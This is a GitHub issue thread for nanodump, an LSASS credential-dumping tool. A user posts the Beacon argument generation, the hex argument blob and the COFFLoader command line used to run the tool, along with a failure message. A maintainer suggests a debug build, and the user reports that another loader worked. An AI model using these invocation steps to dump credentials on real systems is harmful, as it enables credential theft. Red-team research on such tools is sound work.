fortra / nanodump

The swiss army knife of LSASS dumping

Home Page: https://www.coresecurity.com/core-labs/articles/nanodump-red-team-approach-minidumps

Issues when I run with CoffLoader

kaleemshaik7867 opened this issue

Hello Team,
I have tried nanodump with COFFLoader, and I generated the hex value as below. I have tried both the fork and snapshot techniques.

Beacon Argument Generator
Beacon>addint 660
Beacon>addString test.dmp
Beacon>addint 1
Beacon>addint 1
Beacon>addint 0
Beacon>addint 1
Beacon>addint 0
Beacon>addint 1
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>addint 0
Beacon>addint 0
Beacon>addString ""
Beacon>addint 0
Beacon>generate
b'570000009402000009000000746573742e646d700001000000010000000000000001000000000000000100000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000'

Then I ran it with COFFLoader.

COFFLoader64.exe go nanodump.x64.o 570000009402000009000000746573742e646d700001000000010000000000000001000000000000000100000000000000000000000000000000000000030000002222000000000000000000000000000300000022220000000000
Got contents of COFF file
Running/Parsing the COFF file
the --malseclogon-leak-local technique failed!Ran/parsed the coff
Outdata Below:

the --malseclogon-leak-local technique failed!

I could not figure out what the issue could be.

Hi there, why don't you compile the object file in debug mode? make debug -f Makefile.mingw
This should give you more information as to why it failed.

I have used another loader, such as https://github.com/airbus-cert/Invoke-Bof/tree/main, and it worked fine for me.